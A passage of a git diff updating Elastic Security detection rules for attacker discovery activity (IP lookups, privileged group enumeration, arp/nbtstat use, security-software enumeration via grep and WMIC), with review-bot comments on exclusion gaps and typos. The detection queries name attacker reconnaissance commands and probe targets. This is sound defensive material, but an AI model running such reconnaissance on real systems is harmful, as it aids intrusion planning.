@@ -13,12 +13,44 @@ "language": "eql", "license": "Elastic License v2", "name": "External IP Lookup from Non-Browser Process", - "note": "## Triage and analysis\n\n### Investigating External IP Lookup from Non-Browser Process\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for connections to known IP lookup services through non-browser processes or non-installed programs.\nUsing only the IP address of the compromised system, attackers can obtain valuable information such as the system's\ngeographic location, the company that owns the IP, whether the system is cloud-hosted, and more.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Use the data collected through the analysis to investigate other machines affected in the environment.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating External IP Lookup from Non-Browser Process\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for connections to known IP lookup services through non-browser processes or non-installed programs.\nUsing only the IP address of the compromised system, attackers can obtain valuable information such as the system's\ngeographic location, the company that owns the IP, whether the system is cloud-hosted, and more.\n\n#### Possible investigation steps\n\n- Investigate 
the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Use the data collected through the analysis to investigate other machines affected in the environment.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "network where network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-19\", \"S-1-5-20\") and\n event.action == \"lookup_requested\" and\n /* Add new external IP lookup services here */\n dns.question.name :\n (\n \"*api.ipify.org\",\n \"*freegeoip.app\",\n \"*checkip.amazonaws.com\",\n \"*checkip.dyndns.org\",\n \"*freegeoip.app\",\n \"*icanhazip.com\",\n \"*ifconfig.*\",\n \"*ipecho.net\",\n \"*ipgeoapi.com\",\n \"*ipinfo.io\",\n \"*ip.anysrc.net\",\n \"*myexternalip.com\",\n \"*myipaddress.com\",\n \"*showipaddress.com\",\n \"*whatismyipaddress.com\",\n \"*wtfismyip.com\",\n \"*ipapi.co\",\n \"*ip-lookup.net\",\n \"*ipstack.com\"\n ) and\n /* Insert noisy false positives here */\n not process.executable :\n (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\"\n )\n", "references": [ "https://community.jisc.ac.uk/blogs/csirt/article/trickbot-analysis-and-mitigation", 
"https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware" ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1d72d014-e2ab-4707-b056-9b96abe7b511", "severity": "low", @@ -60,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_privileged_localgroup_membership.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_privileged_localgroup_membership.json index 9772cdf9f1ada..98ee661f936b1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_privileged_localgroup_membership.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_privileged_localgroup_membership.json 
@@ -11,10 +11,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Privileged Local Groups Membership", - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known\nlegitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack,\nsuch as mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n- Retrieve the process executable and determine if it is malicious:\n - Check if the file belongs to the operating system or has a valid digital signature.\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "iam where event.action == \"user-member-enumerated\" and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n 
\"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\") and\n /* privileged local groups */\n (group.name:(\"admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known\nlegitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack,\nsuch as mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n- Retrieve the process executable and determine if it is malicious:\n - Check if the file belongs to the operating system or has a valid digital signature.\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "query": "iam where event.action == \"user-member-enumerated\" and\n\n /* excluding machine account */\n not winlog.event_data.SubjectUserName: (\"*$\", \"LOCAL SERVICE\", \"NETWORK SERVICE\") and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"-\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n 
\"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\WindowsAzure\\\\*\\\\WaAppAgent.exe\",\n \"?:\\\\Windows\\\\System32\\\\vssadmin.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\SettingSyncHost.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\",\n \"?:\\\\Windows\\\\Temp\\\\rubrik_vmware???\\\\snaptool.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\x3jobt3?.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\esentutl.exe\",\n \"?:\\\\Windows\\\\System32\\\\RecoveryDrive.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\") and\n\n /* privileged local groups */\n (group.name:(\"admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallerProcessName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + } + ], 
"risk_score": 43, "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", + "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_remote_system_discovery_commands_windows.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_remote_system_discovery_commands_windows.json index d31c55737fb03..ae5414ab2bd6f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_remote_system_discovery_commands_windows.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_remote_system_discovery_commands_windows.json 
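Review bot: The rewritten `+ "note"` still ends with the 'Audit Security Group Management' policy steps and the `event.ingested` paragraph that this same hunk copies into the new `+ "setup"` field, so that text now appears twice in the rule; the sibling rules in this commit (Remote System Discovery Commands, Security Software Discovery using WMIC) drop those paragraphs from `note` once `setup` carries them, and this rule should do the same. Both copies also keep the typo `with with Advanced Audit Configuration`. Separately, the widened `CallerProcessName` exclusion list now contains `?:\\Windows\\Temp\\rubrik_vmware???\\snaptool.exe` and `?:\\$WINDOWS.~BT\\Sources\\*.exe`; Windows\Temp is not an administrator-only location, so a path-only exception there is a weaker fence than the System32 entries around it and deserves a sentence in the false positive section (or a narrower condition that also checks `winlog.event_data.SubjectUserName`) so analysts know the gap exists. The new `required_fields` mark `winlog.event_data.CallerProcessName` and `TargetSid` as `"type": "unknown"` while `SubjectUserName` is `keyword`; presumably this is generated from the integration schema, but it is worth confirming since the query relies on wildcard matching against CallerProcessName.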
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote System Discovery Commands", - "note": "## Triage and analysis\n\n### Investigating Remote System Discovery Commands\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `arp` or `nbstat` utilities to enumerate remote systems in the environment,\nwhich is useful for attackers to identify lateral movement targets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Remote System Discovery Commands\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `arp` or `nbstat` utilities to enumerate remote systems in the environment,\nwhich is useful for attackers to identify lateral movement targets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"nbtstat.exe\" and process.args : (\"-n\", \"-s\")) or\n (process.name : \"arp.exe\" and process.args : \"-a\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } 
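Review bot: The rewritten `+ "note"` still describes the rule as looking for the `arp` or `nbstat` utilities, while the `query` on the same hunk matches `process.name : \"nbtstat.exe\"`; the guide should read `the execution of the `arp` or `nbtstat` utilities` so an analyst searching the note finds the process name the rule actually fires on. Since this commit rewrites the note anyway, fixing the spelling here keeps the guide from drifting further from the query.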
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_grep.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_grep.json index 903fb701e1dee..5712c0ea676da 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_grep.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_grep.json 
@@ -14,10 +14,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Security Software Discovery via Grep", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\nprocess.name : \"grep\" and user.id != \"0\" and\n not process.parent.executable : \"/Library/Application Support/*\" and\n process.args :\n (\"Little Snitch*\",\n \"Avast*\",\n \"Avira*\",\n \"ESET*\",\n \"BlockBlock*\",\n \"360Sec*\",\n \"LuLu*\",\n \"KnockKnock*\",\n \"kav\",\n \"KIS\",\n \"RTProtectionDaemon*\",\n \"Malware*\",\n \"VShieldScanner*\",\n \"WebProtection*\",\n \"webinspectord*\",\n \"McAfee*\",\n \"isecespd*\",\n \"macmnsvc*\",\n \"masvc*\",\n \"kesl*\",\n \"avscan*\",\n \"guard*\",\n \"rtvscand*\",\n \"symcfgd*\",\n \"scmdaemon*\",\n \"symantec*\",\n \"sophos*\",\n \"osquery*\",\n \"elastic-endpoint*\"\n ) and\n not (process.args : \"Avast\" and process.args : \"Passwords\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": 
"medium", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_wmic.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_wmic.json index ebf7a44a5fdcc..77c39d02f260d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_wmic.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_wmic.json 
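Review bot: `+ "note": ""` leaves this rule with no investigation guide, while the query carries two exclusions a triaging analyst needs to know about — `user.id != \"0\"` (grep run as root never alerts) and `not process.parent.executable : \"/Library/Application Support/*\"` — and neither is explained in `description` or the new `setup`. A short note with at least a false positive section stating those exclusions and the `Avast`/`Passwords` exception would bring the rule in line with the Windows discovery rules in this commit, which all carry triage text. If the empty note is a deliberate placeholder for a later guide, a comment in the PR description saying so would avoid re-raising this.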
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Security Software Discovery using WMIC", - "note": "## Triage and analysis\n\n### Investigating Security Software Discovery using WMIC\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `wmic` utility with arguments compatible to the enumeration of the security\nsoftware installed on the host. Attackers can use this information to decide whether or not to infect a system, disable\nprotections, use bypasses, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Security Software Discovery using WMIC\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `wmic` utility with arguments compatible to the enumeration of the security\nsoftware installed on the host. Attackers can use this information to decide whether or not to infect a system, disable\nprotections, use bypasses, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
